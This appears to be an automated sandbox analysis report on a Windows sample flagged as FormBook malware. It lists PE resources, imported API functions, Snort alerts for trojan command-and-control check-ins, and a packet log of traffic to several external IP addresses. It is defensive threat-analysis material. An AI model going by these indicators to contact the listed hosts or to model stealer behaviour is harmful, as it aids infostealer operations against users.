                                                  RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                  RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                  RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                  RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                  RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                  RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                  RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                  RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                  RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                  RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                  RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                  RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                  RT_RCDATA0xd07b80x5a48cdata1.0003272003547825
                                                  RT_GROUP_ICON0x12ac440x76dataEnglishGreat Britain0.6610169491525424
                                                  RT_GROUP_ICON0x12acbc0x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0x12acd00x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0x12ace40x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0x12acf80x10cdataEnglishGreat Britain0.5932835820895522
                                                  RT_MANIFEST0x12ae040x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                  Imports

                                                  DLLImport
                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                  PSAPI.DLLGetProcessMemoryInfo
                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dllIsThemeActive
                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  07/02/24-14:07:01.922969TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973880192.168.2.43.33.130.190
                                                  07/02/24-14:06:46.303031TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973680192.168.2.484.32.84.112
                                                  07/02/24-14:08:39.009481TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976180192.168.2.4109.95.158.127
                                                  07/02/24-14:07:17.766594TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.478.111.111.51
                                                  07/02/24-14:07:36.301715TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974980192.168.2.4172.67.200.242
                                                  07/02/24-14:07:55.738870TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.4116.213.43.190
                                                  07/02/24-14:07:44.596745TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.4188.114.97.3
                                                  07/02/24-14:07:49.702879TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975380192.168.2.4188.114.97.3
                                                  07/02/24-14:07:15.236401TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.478.111.111.51
                                                  07/02/24-14:09:00.595741TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976380192.168.2.4162.0.213.72
                                                  07/02/24-14:07:28.626581TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.4172.67.200.242
                                                  07/02/24-14:08:31.344522TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975880192.168.2.4109.95.158.127
                                                  07/02/24-14:07:22.830857TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974580192.168.2.478.111.111.51
                                                  07/02/24-14:07:59.523620TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.4116.213.43.190
                                                  07/02/24-14:07:42.060544TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.4188.114.97.3
                                                  07/02/24-14:08:33.882411TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975980192.168.2.4109.95.158.127
                                                  07/02/24-14:07:31.173075TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.4172.67.200.242
                                                  07/02/24-14:07:01.922969TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44973880192.168.2.43.33.130.190
                                                  07/02/24-14:07:09.547482TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974180192.168.2.43.33.130.190
                                                  07/02/24-14:09:06.390818TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976580192.168.2.4162.0.213.72
                                                  07/02/24-14:08:04.861584TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975780192.168.2.4116.213.43.190
                                                  07/02/24-14:08:58.056879TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976280192.168.2.4162.0.213.72
                                                  07/02/24-14:07:04.478292TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973980192.168.2.43.33.130.190

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 2, 2024 14:06:46.263716936 CEST4973680192.168.2.484.32.84.112
                                                  Jul 2, 2024 14:06:46.268544912 CEST804973684.32.84.112192.168.2.4
                                                  Jul 2, 2024 14:06:46.268634081 CEST4973680192.168.2.484.32.84.112
                                                  Jul 2, 2024 14:06:46.303030968 CEST4973680192.168.2.484.32.84.112
                                                  Jul 2, 2024 14:06:46.314713955 CEST804973684.32.84.112192.168.2.4
                                                  Jul 2, 2024 14:06:46.773809910 CEST804973684.32.84.112192.168.2.4
                                                  Jul 2, 2024 14:06:46.773828983 CEST804973684.32.84.112192.168.2.4
                                                  Jul 2, 2024 14:06:46.773842096 CEST804973684.32.84.112192.168.2.4
                                                  Jul 2, 2024 14:06:46.773966074 CEST4973680192.168.2.484.32.84.112
                                                  Jul 2, 2024 14:06:46.776957989 CEST4973680192.168.2.484.32.84.112
                                                  Jul 2, 2024 14:06:46.782212019 CEST804973684.32.84.112192.168.2.4
                                                  Jul 2, 2024 14:07:01.874866009 CEST4973880192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:01.880852938 CEST80497383.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:01.880942106 CEST4973880192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:01.922969103 CEST4973880192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:01.927834988 CEST80497383.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:02.366219997 CEST80497383.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:02.366278887 CEST4973880192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:03.444808960 CEST4973880192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:03.450254917 CEST80497383.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:04.467611074 CEST4973980192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:04.472637892 CEST80497393.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:04.472814083 CEST4973980192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:04.478291988 CEST4973980192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:04.483962059 CEST80497393.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:04.942056894 CEST80497393.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:04.942177057 CEST4973980192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:05.991560936 CEST4973980192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:05.996473074 CEST80497393.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.010162115 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:07.015022993 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.015108109 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:07.017208099 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:07.022105932 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022115946 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022159100 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022224903 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022233963 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022252083 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022259951 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022362947 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022372007 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.492958069 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.493246078 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:08.522850037 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:08.702892065 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:09.540884018 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:09.545787096 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:09.545871019 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:09.547482014 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:09.552675962 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:10.032242060 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:10.032632113 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:10.032690048 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:10.034487963 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:10.039310932 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:15.229793072 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:15.234581947 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.234668016 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:15.236401081 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:15.241164923 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.971025944 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.971051931 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.971141100 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:16.741624117 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.759876013 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.764764071 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:17.764859915 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.766593933 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.771359921 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:18.480823040 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:18.480926991 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:18.480981112 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:19.272766113 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.291213989 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.296124935 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.298950911 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.301001072 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.305819035 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.305860996 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.305870056 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306076050 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306085110 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306099892 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306107998 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306116104 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306123972 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:21.084012985 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:21.084398031 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:21.084455013 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:21.804059982 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.822352886 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.827528000 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:22.828941107 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.830857038 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.840926886 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581276894 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581300020 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581310034 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581505060 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:23.583995104 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:23.588846922 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:28.611445904 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:28.616502047 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:28.617113113 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:28.626580954 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:28.634252071 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:29.294024944 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:29.294047117 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:29.294118881 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:30.147747993 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.166341066 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.171264887 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.171364069 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.173074961 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.177967072 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.817847013 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.819001913 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.819058895 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:32.679080009 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.697302103 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.702234983 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.702341080 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.704408884 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.709207058 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709217072 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709227085 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709234953 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709275961 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709407091 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709414959 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709428072 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709435940 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:34.369199038 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:34.370341063 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:34.370382071 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:35.210294008 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.282033920 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.286987066 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.287053108 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.301714897 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.306566000 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.996526003 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.997064114 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.997128010 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:37.004695892 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:37.009490967 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:42.053607941 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:42.058340073 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.058397055 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:42.060544014 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:42.065319061 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.956278086 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.956625938 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.956685066 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:43.569757938 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.588247061 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.594861984 CEST8049751188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:44.594933033 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.596745014 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.601577044 CEST8049751188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:45.270081043 CEST8049751188.114.97.3192.168.2.4
